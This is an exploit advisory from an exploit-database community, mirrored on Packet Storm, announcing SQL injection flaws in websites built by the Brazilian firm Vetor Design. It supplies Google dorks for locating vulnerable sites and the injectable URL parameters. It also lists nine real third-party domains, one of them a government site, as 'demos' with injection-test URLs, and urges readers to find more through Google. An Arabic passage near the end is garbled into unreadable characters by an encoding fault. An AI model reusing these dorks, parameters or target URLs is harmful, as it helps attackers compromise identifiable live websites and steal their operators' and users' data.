Vetor Design based sites suffer from multiple remote SQL injection vulnerabilities. Note that this finding houses site-specific data.
fd917f043929b483d7b010f851cf056f010cf2f878bc643ccff5d44b63a5148e1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm TUNISIAN CYBER member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] Author: TUNISIAN CYBER
[+] Home: 1337day.com Inj3ct0r Exploit DataBase
[+] Exploit Title: Vetor Design SQL Injection Vulnerability
[+] Date: 15-09-2012
[+] Category: WebApp
[+] Google Dork:
intext:"Desenvolvido por Vetor Design." .php?lid=
intext:"Desenvolvido por Vetor Design." .php?lid=
intext:"Desenvolvido por Vetor Design." .php?cat=
intext:"Desenvolvido por Vetor Design." .php?cat=
[+] Tested on: Windows 7 Professionnel / Windows Server 2008
[+] Vendor: http://www.vetor.net/
####################################################################################
#################################################################################
||| ~~ Use It At Your Own Risk ~~ |||
||| It's For Educational Purpos Only |||
||| I'm not Responsible For Any Damage |||
#################################################################################
Examples
127.0.0.1/produtos_linha.php?lid=[SQLi]
127.0.0.1/noticias.php?cat=[SQLi]
127.0.0.1/fotos.php?cid=[SQLi]
127.0.0.1/catProjetos.php?cid=[SQLi]
#################################################################################
Demos:
http://www.bompel.com.br/produtos_linha.php?lid=12'
http://www.agricolahorizonte.com.br/noticias.php?cat=12'
http://www.musicallstudio.com.br/portfolio.php?cid=9'
http://www.willmutt.com.br/fotos.php?cid=3'
http://www.arlenarquitetura.com/catProjetos.php?cid=22'
http://www.calcadosbeiralago.com.br/produto.php?id=12'
http://www.marechal.fm.br/conteudo.php?id=26'
http://www.patobragado.pr.gov.br/evento.php?id=4'
http://www.lfzagronegocio.com.br/intercambio.php?id=12'
More in Google =)
áÇ Çáå ÇáÇ Çááå ãÍãÏÇ ÚÈÏå æÑÓæáå
æÃäÒá ÚÞÇÈÇ ÃáíãÇ Úá ßá ãä íÊØÇæá Úáì ÇáÅÓáÇã æÇáãÓáãíä
ÑÍã Çááå ßá ãä ÊæÝì
./3nD
########################################################################################
Greets to: TN H4CK3RZ( Badi - xMax-tn - Silent_hill - pipo issam - anas laribi - xtech set) , r00tw0rm members and Inj3ct0r Team
###########################################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed